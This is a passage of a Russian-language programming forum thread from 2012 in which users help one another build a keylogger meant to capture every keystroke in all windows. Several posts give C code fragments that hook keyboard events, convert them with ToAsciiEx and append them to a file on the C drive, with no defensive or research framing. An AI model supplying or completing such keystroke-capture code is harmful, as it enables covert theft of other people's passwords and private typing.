Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Низкоуровневое программирование > Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 27.02.2012, 21:08   #31
EUGY
Форумчанин
 
Аватар для EUGY
 
Регистрация: 11.07.2010
Сообщений: 914
По умолчанию

Ну,вот, имеем рабочую болванку.
В файл писать Вы умеете, но все подряд писать смысла нет.
Кейлогер должен следить за каким-то определенным процессом, окном?
EUGY вне форума Ответить с цитированием
Старый 27.02.2012, 21:15   #32
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
По умолчанию

Код:
Кейлогер должен следить за каким-то определенным процессом, окном?
вообще в идеале чтоб следил за всеми нажатиями клавиш во всех окнах
stdio вне форума Ответить с цитированием
Старый 27.02.2012, 21:40   #33
EUGY
Форумчанин
 
Аватар для EUGY
 
Регистрация: 11.07.2010
Сообщений: 914
По умолчанию

Тогда остается ToAsciiEx и все.
EUGY вне форума Ответить с цитированием
Старый 27.02.2012, 22:17   #34
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
По умолчанию

у меня вот тут ещё не работает
Код:
FILE *fp;
		fp=fopen("C:\\Key.txt","a+");
		//fprintf(C,"нажата клавиша с кодом %x \n", pkbs->vkCode);
        wsprintf(C,"нажата клавиша с кодом %x \n", pkbs->vkCode);
        fclose (fp);

		OutputDebugString(C);
stdio вне форума Ответить с цитированием
Старый 27.02.2012, 22:54   #35
EUGY
Форумчанин
 
Аватар для EUGY
 
Регистрация: 11.07.2010
Сообщений: 914
По умолчанию

Код:
    FILE *fp=fopen("C:\\Key.txt","a+");
    fprintf(fp, "%s", &pkbs->vkCode);
    fclose (fp);
EUGY вне форума Ответить с цитированием
Старый 27.02.2012, 23:09   #36
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
По умолчанию

Спасибо ограмное))
вот нашёл такой код
Код:
int nKeys = ToAsciiEx(wParam, (lParam & 0x00ff0000 >> 16), 
                    lpKeyboardState, &wCharacter, 0, hKeyboardLayout);
          char cKey = (char)wCharacter;
          // здесь можно сохранить cKey в файл
буду экспериментировать
stdio вне форума Ответить с цитированием
Старый 28.02.2012, 03:08   #37
Ulex
Непрофессионал
Участник клуба
 
Аватар для Ulex
 
Регистрация: 01.01.2008
Сообщений: 1,432
По умолчанию

ассемблер, он такой ассемблер
И чем больше я узнавал людей, тем больше мне нравились компьютеры.
------------------------------------
Страничка с моими программками http://ulex-masm.ru
Ulex вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перевод формул на язык програмирования (Pascal) spinogryz_ua Помощь студентам 7 16.01.2012 17:51
язык ассемблера nastya_m Помощь студентам 5 07.12.2011 13:15
Перевод программы на русский язык. shivo Фриланс 1 05.01.2011 15:20
помогите с написанием бат файла Aivar Помощь студентам 2 24.09.2008 22:58